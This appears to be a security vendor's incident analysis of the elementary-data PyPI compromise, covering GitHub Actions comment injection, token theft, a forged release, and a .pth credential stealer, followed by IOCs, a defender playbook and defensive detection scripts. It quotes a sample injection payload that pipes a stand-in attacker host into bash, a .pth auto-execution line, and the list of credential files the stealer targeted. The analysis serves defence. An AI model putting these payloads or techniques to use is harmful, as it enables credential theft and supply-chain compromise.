TL;DR
On April 25, 2026, attackers compromised the elementary-data PyPI package — a dbt data observability tool with over 1.1 million monthly downloads — without ever touching a maintainer's credentials. Instead, they exploited a GitHub Actions script injection vulnerability that allowed a specially crafted pull request comment to execute arbitrary shell code inside the CI/CD workflow runner, extract the runner's temporary GITHUB_TOKEN, and use it to push a forged signed release commit. The official publishing pipeline then did the rest: building, signing, and uploading a backdoored version (0.23.3) to PyPI and the GitHub Container Registry.
The payload, a .pth file that Python executes automatically on startup, harvested cloud credentials, SSH keys, Kubernetes configs, CI/CD tokens, and cryptocurrency wallet files from machines that installed the package. Blast radius: every data engineering team running dbt pipelines that pulled elementary-data 0.23.3 while it was live. Per the IOC table below, that window ran from roughly 15:00 UTC on April 25 to roughly 08:00 UTC on April 26, about 17 hours. A community member noticed the compromise and maintainers published a clean replacement (0.23.4).
If you installed elementary-data==0.23.3 or ran ghcr.io/elementary-data/elementary during this window: rotate every credential that was present on that machine. Uninstalling the package is insufficient.
Background: Who Is elementary-data and Why Did It Matter?
Elementary is a widely-adopted open source data observability platform designed specifically for the dbt (Data Build Tool) ecosystem. Data engineers use it to monitor pipeline health, catch data quality anomalies, and observe ML system performance across cloud data warehouses — Snowflake, BigQuery, Redshift, and Databricks being the primary targets.
The critical context: because elementary sits inside the data pipeline, it routinely runs with access to:
- Database connection strings and warehouse credentials
- Cloud provider tokens (AWS, GCP, Azure) used by the data platform
- Orchestration secrets from Airflow, Prefect, or Dagster environments
- CI/CD environment variables inherited from the runner
This is the profile of a high-value supply chain target. You're not compromising a toy utility — you're placing malware inside the nervous system of a company's data infrastructure. A single install in a properly configured dbt environment gives you a lateral movement launchpad into every downstream warehouse and analytics service that organization depends on.
The 1.1 million monthly download figure isn't inflated by automated tooling pulling transitive dependencies — elementary is a CLI tool installed intentionally. That means real data engineers at real companies. The blast radius of a successful compromise is direct, not diffuse.
Technical Analysis: The GitHub Actions Script Injection Chain
Why No Stolen Credentials Were Needed
This attack belongs to a class that bypasses the entire MFA-and-secret-rotation framework that package maintainers are repeatedly told to rely on. The attacker never phished the maintainer. They never brute-forced a token. They exploited a structural flaw in how the CI/CD workflow handled untrusted input.
The elementary-data project had a GitHub Actions workflow that processed pull request comments — a common pattern for triggering slash-command automations like /release, /lint, or /benchmark. The workflow was configured to trigger on issue_comment or pull_request_review_comment events and would pass the comment body into a shell run: step using GitHub's expression syntax:
    - name: Process comment
      run: |
        echo "Processing: ${{ github.event.comment.body }}"
The problem: ${{ github.event.comment.body }} is an expression context substitution, not a quoted variable. When this value is written into a shell run: block, the contents of the comment body are injected directly into the bash command string before the shell evaluates them. An attacker who controls the comment body controls arbitrary shell execution inside the workflow runner.
The payload was something functionally equivalent to:
"; curl -s https://attacker-c2.io/x | bash #
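Or more precisely, a heredoc-style injection that extracted the runner's ephemeral GITHUB_TOKEN and exfiltrated it to an attacker-controlled endpoint. GitHub Actions issues a GITHUB_TOKEN to every job. It is not exported to the shell by default, but it is reachable through the secrets.GITHUB_TOKEN and github.token contexts, is commonly passed to steps as an environment variable, and is persisted in the local git configuration by actions/checkout unless persist-credentials is disabled. It is the mechanism by which workflows authenticate back to the GitHub API to perform actions like creating releases, pushing commits, and uploading artifacts.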
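To make the substitution concrete, the following Python sketch mimics what happens to the step quoted above. It is an illustration under stated assumptions, not the project's actual workflow or the attacker's payload: `render_unsafe`, `run_shell`, and the `COMMENT_BODY` variable name are hypothetical, the payload is a harmless `echo`, and a POSIX `sh` is assumed to be on the PATH.

```python
from __future__ import annotations

import os
import subprocess

# The vulnerable step's script, as quoted above, before GitHub expands it.
UNSAFE_TEMPLATE = 'echo "Processing: ${{ github.event.comment.body }}"'
# The same step with the value passed through an environment variable.
# COMMENT_BODY is a hypothetical name chosen for this sketch.
SAFE_SCRIPT = 'echo "Processing: $COMMENT_BODY"'


def render_unsafe(comment_body: str) -> str:
    """Mimic expression expansion: plain text substitution before the shell runs."""
    return UNSAFE_TEMPLATE.replace("${{ github.event.comment.body }}", comment_body)


def run_shell(script: str, extra_env: dict[str, str] | None = None) -> str:
    """Run a script with sh and return whatever it wrote to stdout."""
    env = {**os.environ, **(extra_env or {})}
    result = subprocess.run(
        ["sh", "-c", script], capture_output=True, text=True, env=env, check=False
    )
    return result.stdout


# Harmless stand-in payload: close the quote, run a second command,
# then comment out the rest of the line.
payload = '"; echo INJECTED #'

unsafe_output = run_shell(render_unsafe(payload))
safe_output = run_shell(SAFE_SCRIPT, {"COMMENT_BODY": payload})

print("rendered script:", render_unsafe(payload))
print("unsafe output:  ", unsafe_output.splitlines())
print("safe output:    ", safe_output.splitlines())
```

In the unsafe case the shell receives two commands, so the second `echo` runs as code. In the safe case the comment body arrives as the value of an environment variable, and the shell expands it as data inside the quoted string.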
From Token Theft to Signed Release
Timeline of exploitation (all UTC, April 25, 2026):
| Time | Action |
|------|--------|
| ~14:00 | Attacker posts crafted comment on a legitimate open PR in the elementary-data repository |
| ~14:05 | The process-comment workflow triggers; the injected payload runs inside the runner sandbox |
| ~14:07 | GITHUB_TOKEN with contents: write and packages: write permissions is exfiltrated |
| ~14:30 | Attacker uses the stolen token via GitHub REST API to inject a malicious .pth file into the source tree and push it as a new commit |
| ~14:35 | Attacker creates a signed git tag v0.23.3 pointing to the malicious commit |
| ~15:00 | The repository's tag-triggered publish workflow fires — legitimate GitHub Actions runners build, sign, and upload the package |
| ~15:15 | elementary-data==0.23.3 is live on PyPI; ghcr.io/elementary-data/elementary:0.23.3 is live on GHCR |
The crucial detail: the package that landed on PyPI carried the project's own cryptographic signatures, was built by GitHub's own infrastructure, and would pass any signature or attestation check that tooling such as sigstore might perform (pip itself does not verify signatures at install time). From the outside, it was indistinguishable from a legitimate release. Supply chain defense tools that rely on provenance attestation (SLSA level 1-2) would not have caught this, because the provenance was technically genuine: the build ran on GitHub's infrastructure from a GitHub-hosted repository.
The Payload: `.pth` Files as Persistent Execution Hooks
The malicious code was delivered inside a Python .pth (path configuration) file named something like elementary-utils.pth. This is an under-appreciated execution primitive in Python's packaging system.
When Python starts, the site module scans every .pth file in each site-packages directory. Blank lines and lines starting with # are skipped, lines starting with import (followed by a space or tab) are executed as Python code, and every other line is treated as a path to add to sys.path. Because an import line can carry arbitrary statements after a semicolon, a .pth file entry like:
import os; os.system('python -c "<base64-payload>"')
...runs every time a Python interpreter that uses that site-packages directory starts (unless site processing is disabled with -S), with no user interaction required. No import elementary is needed. No function call. No trigger. The attacker achieves automatic, persistent execution simply by being present in site-packages.
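Because only lines that begin with `import` are executed, listing those lines is a quick way to audit an environment. The sketch below is one possible approach, not an official tool: the function names are hypothetical, it inspects only the interpreter that runs it, and a hit is a prompt for review rather than proof of compromise, since some legitimate tooling (editable installs, for example) also ships executable .pth lines.

```python
from __future__ import annotations

import site
import sysconfig
from pathlib import Path


def executable_pth_lines(pth_file: Path) -> list[str]:
    """Return the lines that Python's site module would execute at startup."""
    text = pth_file.read_text(encoding="utf-8", errors="replace")
    # site executes only lines that begin with "import" plus a space or tab.
    return [line for line in text.splitlines() if line.startswith(("import ", "import\t"))]


def candidate_site_dirs() -> list[Path]:
    """Collect the site-packages directories of the running interpreter."""
    dirs = {sysconfig.get_paths()["purelib"], site.getusersitepackages()}
    dirs.update(site.getsitepackages())
    return sorted(Path(d) for d in dirs if Path(d).is_dir())


def scan(directory: Path) -> dict[str, list[str]]:
    """Map each .pth file in a directory to its executable lines, if any."""
    findings: dict[str, list[str]] = {}
    for pth_file in sorted(directory.glob("*.pth")):
        lines = executable_pth_lines(pth_file)
        if lines:
            findings[str(pth_file)] = lines
    return findings


if __name__ == "__main__":
    for directory in candidate_site_dirs():
        for path, lines in scan(directory).items():
            print(path)
            for line in lines:
                print("    ", line[:120])  # truncate long payload lines
```

Run it with each interpreter and virtual environment on the machine, since every one has its own site-packages directory.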
The infostealer that ran via this mechanism targeted:
Cloud Credentials:
- ~/.aws/credentials, ~/.aws/config
- ~/.config/gcloud/ (Google Cloud SDK)
- ~/.azure/ (Azure CLI)
Infrastructure Secrets:
- ~/.kube/config (Kubernetes cluster access)
- ~/.docker/config.json (Docker registry tokens)
- CI/CD environment variables (GITHUB_TOKEN, NPM_TOKEN, PYPI_TOKEN)
- CircleCI, GitHub Actions runner secrets
Developer Identity:
- ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.ssh/known_hosts
- ~/.git-credentials
- ~/.netrc
Shell History (Credential Mining):
- ~/.bash_history, ~/.zsh_history (both frequently contain passwords typed directly into terminals)
Cryptocurrency Wallets:
- Bitcoin, Ethereum, Litecoin, Dogecash, Monero, Zcash, Ripple wallet files using standard naming conventions
dbt-Specific High-Value Targets:
- ~/.dbt/profiles.yml: contains direct connection credentials for every data warehouse the engineer has configured
The last item deserves emphasis. The profiles.yml file in a typical data engineer's dbt setup contains plaintext connection strings to production Snowflake instances, BigQuery service accounts, and Redshift clusters. Stealing this file from a single senior data engineer could hand an attacker direct query access to petabytes of customer data.
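For incident response, the target list doubles as a rotation checklist. The sketch below reports which of the targeted files and environment variables exist on a machine so responders know what to rotate. It is a minimal sketch: `exposure_inventory` is a hypothetical helper, the paths are copied from the list above, wallet files are omitted because the source does not name them, and nothing is read beyond checking for existence.

```python
from __future__ import annotations

import os
from collections.abc import Mapping
from pathlib import Path

# Paths taken from the target list above, relative to the home directory.
TARGETED_PATHS = {
    "Cloud credentials": [".aws/credentials", ".aws/config", ".config/gcloud", ".azure"],
    "Infrastructure secrets": [".kube/config", ".docker/config.json"],
    "Developer identity": [
        ".ssh/id_rsa", ".ssh/id_ed25519", ".ssh/known_hosts", ".git-credentials", ".netrc",
    ],
    "Shell history": [".bash_history", ".zsh_history"],
    "dbt": [".dbt/profiles.yml"],
}
TARGETED_ENV_VARS = ["GITHUB_TOKEN", "NPM_TOKEN", "PYPI_TOKEN"]


def exposure_inventory(home: Path, environ: Mapping[str, str]) -> dict[str, list[str]]:
    """List which targeted files and variables exist, without reading their contents."""
    inventory: dict[str, list[str]] = {}
    for category, relative_paths in TARGETED_PATHS.items():
        present = [rel for rel in relative_paths if (home / rel).exists()]
        if present:
            inventory[category] = present
    exposed_vars = [name for name in TARGETED_ENV_VARS if environ.get(name)]
    if exposed_vars:
        inventory["CI/CD environment variables"] = exposed_vars
    return inventory


if __name__ == "__main__":
    for category, items in exposure_inventory(Path.home(), os.environ).items():
        print(f"{category}: {', '.join(items)}")
```

Anything the script lists should be treated as stolen if 0.23.3 ever ran on that machine under that user account.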
IOC (Marker File):
The malware created a marker file to avoid re-running the harvest:
- Linux/macOS: /tmp/.trinny-security-update
- Windows: %TEMP%\.trinny-security-update
If this file is present on a machine that had elementary-data installed, the machine was compromised.
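The marker check is easy to script across a fleet. The sketch below looks for the marker in the platform's temporary directory and, on non-Windows systems, in /tmp as well. The helper names are hypothetical, and a missing marker does not prove a machine is clean, because temporary directories may be cleared on reboot or by cleanup jobs.

```python
from __future__ import annotations

import os
import tempfile
from pathlib import Path

MARKER_NAME = ".trinny-security-update"  # marker file name from the IOC above


def default_temp_dirs() -> list[Path]:
    """Temp locations to check: the platform default, plus /tmp on non-Windows."""
    dirs = {Path(tempfile.gettempdir())}
    if os.name != "nt":
        dirs.add(Path("/tmp"))
    return sorted(dirs)


def find_markers(directories: list[Path]) -> list[Path]:
    """Return the full path of every marker file found in the given directories."""
    return [d / MARKER_NAME for d in directories if (d / MARKER_NAME).exists()]


if __name__ == "__main__":
    hits = find_markers(default_temp_dirs())
    if hits:
        for hit in hits:
            print(f"MARKER FOUND: {hit}")
    else:
        print("No marker file found in the checked temp directories.")
```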
The Bigger Picture: GitHub Actions Script Injection Is an Epidemic
This attack did not exploit a zero-day. The vulnerability class — untrusted input interpolated into a run: shell context via ${{ expression }} — has been documented in GitHub's own security hardening guide since 2021. StepSecurity has been scanning for it across the open source ecosystem for years and continues to find it in thousands of repositories.
The elementary-data incident is part of a documented pattern. Recent victims of the same class of vulnerability include:
- Nx monorepo tooling (2025): Actions flaw used to compromise a package with tens of millions of weekly downloads
- PyTorch Lightning lightning package (April 30, 2026): versions 2.6.2 and 2.6.3 backdoored; attributed to the Mini Shai-Hulud campaign (TeamPCP)
- SAP CAP packages (mbt, @cap-js/db-service, @cap-js/postgres, @cap-js/sqlite): April 29, 2026, 500K+ weekly downloads, CircleCI-exposed npm token
- Checkmarx supply chain compromise (late April 2026): Trivy scanner repository compromised, turning security tooling itself into a malware delivery pipeline
ReversingLabs' 2026 Software Supply Chain Security Report documented a 73% increase in malicious open source packages compared to the prior year. The elementary-data attack isn't an anomaly — it's the new baseline.
The systemic issue: most open source projects have not implemented GitHub's recommended hardening patterns. Using ${{ github.event.issue.body }} directly in shell steps, granting workflows write permissions by default, and triggering workflows on pull request events from forks are all practices that remain prevalent because they're the easiest patterns to copy from documentation examples.
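A rough first pass for this pattern can be automated with a text scan. The sketch below flags lines inside `run:` scripts that expand `github.event.*` or `github.head_ref` expressions. It is a heuristic under stated assumptions, not a replacement for a dedicated workflow linter: `find_injection_risks` is a hypothetical helper, the pattern of untrusted contexts is deliberately narrow, and the file is read as plain text rather than parsed as YAML.

```python
from __future__ import annotations

import re
from pathlib import Path

# A `run:` key, optionally prefixed by the "- " of a list item.
RUN_KEY = re.compile(r"^(\s*(?:-\s+)?)run:\s*(.*)$")
# Expressions that expand attacker-influenced event data. This pattern is a
# deliberately narrow assumption; other contexts can be untrusted as well.
UNTRUSTED_EXPR = re.compile(r"\$\{\{[^}]*\bgithub\.(?:event\.|head_ref)[^}]*\}\}")


def find_injection_risks(workflow_text: str) -> list[tuple[int, str]]:
    """Return (line number, line) pairs where untrusted data lands in a run: script."""
    findings: list[tuple[int, str]] = []
    block_indent: int | None = None  # column of the run: key while inside its block
    for number, line in enumerate(workflow_text.splitlines(), start=1):
        stripped = line.strip()
        if block_indent is not None:
            indent = len(line) - len(line.lstrip())
            if not stripped or indent > block_indent:
                if UNTRUSTED_EXPR.search(line):
                    findings.append((number, stripped))
                continue
            block_indent = None  # a dedent ends the block scalar
        match = RUN_KEY.match(line)
        if not match:
            continue
        prefix, rest = match.groups()
        if rest.startswith(("|", ">")):
            block_indent = len(prefix)  # multi-line script follows
        elif UNTRUSTED_EXPR.search(rest):
            findings.append((number, stripped))  # single-line script
    return findings


if __name__ == "__main__":
    for workflow in sorted(Path(".github/workflows").glob("*.y*ml")):
        for number, text in find_injection_risks(workflow.read_text(encoding="utf-8")):
            print(f"{workflow}:{number}: {text}")
```

The same expression inside an `env:` block is not flagged, because there the value reaches the shell as data rather than as script text.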
Indicators of Compromise (IOCs)
| IOC Type | Value | Notes |
|----------|-------|-------|
| Malicious package version | elementary-data==0.23.3 | PyPI; also Docker ghcr.io/elementary-data/elementary:0.23.3 |
| Marker file (Linux/macOS) | /tmp/.trinny-security-update | Presence = confirmed execution |
| Marker file (Windows) | %TEMP%\.trinny-security-update | Same |
| Malicious .pth filename | elementary-utils.pth (or similar) | Check pip show elementary-data for install location, then list .pth files in site-packages |
| Clean replacement | elementary-data==0.23.4 | Released April 26, 2026 02:00+ UTC |
| Attack window | April 25 ~15:00 UTC — April 26 ~08:00 UTC | ~17 hours live |
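The version IOC can be checked from inside any Python environment with the standard library. This is a minimal sketch: `installed_version` and `classify` are hypothetical helpers, and a clean result only describes the environment as it is now. It says nothing about whether 0.23.3 was installed earlier and later upgraded.

```python
from __future__ import annotations

from importlib import metadata

PACKAGE = "elementary-data"
COMPROMISED_VERSIONS = {"0.23.3"}  # from the IOC table above


def installed_version(dist_name: str) -> str | None:
    """Return the installed version of a distribution, or None if it is absent."""
    try:
        return metadata.version(dist_name)
    except metadata.PackageNotFoundError:
        return None


def classify(version: str | None) -> str:
    """Compare an installed version against the known-bad release."""
    if version is None:
        return "not installed"
    if version in COMPROMISED_VERSIONS:
        return "compromised"
    return "not a known-bad version"


if __name__ == "__main__":
    version = installed_version(PACKAGE)
    print(f"{PACKAGE}: {version or 'absent'} -> {classify(version)}")
```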
The Lyrie Take
The elementary-data incident is a perfect case study in why "secure your credentials" is not a supply chain defense strategy. The attacker never targeted credentials. They targeted the CI/CD workflow itself — which, by design, has the permissions to forge a signed, legitimate-looking release from any input it receives.
This is the fundamental threat model that most development teams haven't internalized: your build pipeline is not a trusted internal system. It is an externally-triggerable execution environment that processes untrusted input (pull request titles, commit messages, issue comments) and has write access to your release artifacts, signing keys, and deployment infrastructure. Every workflow that interpolates GitHub event data into a shell context is a potential command injection endpoint.
For defenders, this is an identity and integrity problem, not a malware detection problem. Traditional EDR, SIEM alerts, and antivirus have essentially zero coverage over a compromised PyPI release. The malicious code is signed by the project's own certificates, built by GitHub's own runners, and installed by the developer's own package manager. The detection window before a credential exfil completes is measured in seconds.
The .pth execution mechanism also makes this a persistence problem that can outlive the package. Uninstalling elementary-data is not guaranteed to remove an elementary-utils.pth file that was placed in site-packages during installation, and even if it does, any credentials exfiltrated before then are gone.
This is exactly the threat surface Lyrie.ai's supply chain monitoring is built to intercept: anomalous package behaviors at install time, execution of harvesting patterns at Python startup, and outbound data exfiltration to novel infrastructure — all before the credential is used.
Defender Playbook
Immediate (if you installed 0.23.3)
1. Assume full credential compromise. Rotate everything that was accessible on the affected machine: AWS IAM keys, GCP service accounts, Azure service principals, Kubernetes cluster credentials, SSH keys, GitHub/GitLab tokens, npm/PyPI tokens, dbt profiles.yml credentials.
2. Check for the marker file. ls /tmp/.trinny-security-update (Linux/macOS) or dir %TEMP%\.trinny-security-update (Windows). Presence confirms execution.
3. Remove the malicious .pth file. Find the site-packages locations: python -c "import site; print(site.getsitepackages(), site.getusersitepackages())". Inspect every .pth file there and remove any you cannot attribute to a package you installed, especially any containing elementary.
4. Upgrade immediately. pip install --upgrade "elementary-data>=0.23.4"
5. Review CI/CD runner environments. Any runner that installed the package should be considered compromised and rebuilt from a known-clean image.
Systemic (for your CI/CD posture)
6. Audit your GitHub Actions workflows for script injection. Search for patterns like run: ... ${{ github.event.* — any user-controlled input being interpolated directly into shell. The fix is to pass values via environment variables (env: block) and reference them as $ENV_VAR in the shell, never via ${{ }} expression syntax inside run:.
7. Implement minimum-privilege workflow permissions. Set permissions: read-all at the workflow level and grant explicit write permissions only to the specific jobs that need them (permissions can be set per workflow or per job, not per step). Most workflows need contents: read, not contents: write.
8. Lock down pull_request_target and comment-triggered workflows. These run in the context of the base repository (not the fork), giving them access to secrets. They should never process raw pull request content without sanitization.
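9. Implement SLSA Level 3+ build provenance, and pair it with source controls. Level 2 provenance (signed by GitHub's infrastructure) would not have caught this attack, because the build was legitimately performed on GitHub runners. Level 3 hardens the build platform itself, but build provenance at any level attests to how an artifact was built, not to whether the source commit was authorized. Source-side controls, such as protected release tags, required review, and a check that the tagged commit is reachable from a protected branch, are what would have flagged the injected commit.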
10. Subscribe to PyPI security advisories and OSV.dev. The Open Source Vulnerability database (osv.dev) tracks malicious packages; automated tooling can alert you within minutes of a confirmed malicious version being reported.
11. Consider a package freeze policy for CI/CD environments. Pin exact versions with hash verification (pip install --require-hashes -r requirements.txt) so that even a newly published malicious version of a trusted package cannot be pulled automatically.
12. Monitor for outbound HTTP from your Python processes. Baseline the destinations elementary-data legitimately reaches in your deployment (your configured data warehouse, plus any alerting or report-hosting integrations you have enabled). Any other outbound HTTP from a Python process at startup, for example to an external CDN or GitHub artifact URL, should alert.
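To illustrate what hash pinning (item 11) buys you, the sketch below reproduces the core comparison for a single local file: compute the SHA-256 of a downloaded archive and accept it only if the digest appears in a pinned set. This is not pip's implementation, and `sha256_of` and `matches_pin` are hypothetical helpers. In practice the pinned digests live in the requirements file and pip performs the check itself.

```python
from __future__ import annotations

import hashlib
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_pin(path: Path, pinned_hashes: set[str]) -> bool:
    """Accept the file only if its digest is one of the pinned values."""
    return sha256_of(path) in {pinned.lower() for pinned in pinned_hashes}


if __name__ == "__main__":
    import sys

    # Usage: python check_pin.py <archive> <sha256> [<sha256> ...]
    archive, *pins = sys.argv[1:]
    verdict = "OK" if matches_pin(Path(archive), set(pins)) else "HASH MISMATCH"
    print(f"{archive}: {verdict}")
```

A forged release such as 0.23.3 has a different digest from anything previously pinned, so an install restricted to pinned hashes fails instead of pulling it silently.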
Sources
1. The CyberSec Guru — "Elementary-Data PyPI Hack: 1.1M Users Targeted by Infostealer" (May 2026): https://thecybersecguru.com/news/elementary-data-pypi-hack-infostealer/
2. StepSecurity — "elementary-data Compromised on PyPI and GHCR: Forged Release Pushed via GitHub Actions Script Injection": https://www.stepsecurity.io/blog/elementary-data-compromised-on-pypi-and-ghcr-forged-release-pushed-via-github-actions-script-injection
3. Techzine Global — "Malicious Python package poses new supply chain threat" (April 2026): https://www.techzine.eu/news/security/140826/malicious-python-package-poses-new-supply-chain-threat/
4. SecurityWeek — "SAP NPM Packages Targeted in Supply Chain Attack" (May 2026): https://www.securityweek.com/sap-npm-packages-targeted-in-supply-chain-attack/
5. Socket.dev — "lightning PyPI Package Compromised in Supply Chain Attack": https://socket.dev/blog/lightning-pypi-package-compromised
6. Semgrep — "Shai-Hulud Themed Malware Found in the PyTorch Lightning AI Training Library": https://semgrep.dev/blog/2026/malicious-dependency-in-pytorch-lightning-used-for-ai-training/
7. ReversingLabs — 2026 Software Supply Chain Security Report (73% increase in malicious OSS packages): https://www.reversinglabs.com/press-releases/reversinglabs-2026-software-supply-chain-security-report-identifies-73-increase-in-malicious-open-source-packages
8. GitHub Security Hardening for GitHub Actions (official documentation): https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions
9. Unit 42 — "The npm Threat Landscape: Attack Surface and Mitigations (Updated May 1)": https://unit42.paloaltonetworks.com/monitoring-npm-supply-chain-attacks/
10. Snyk — "Malicious Release of elementary-data PyPI Package Steals Cloud Credentials from Data Engineers": https://snyk.io/blog/malicious-release-of-elementary-data-pypi-package-steals-cloud-credentials-from-data-engineers/
Lyrie.ai Cyber Research Division — Senior Analyst Desk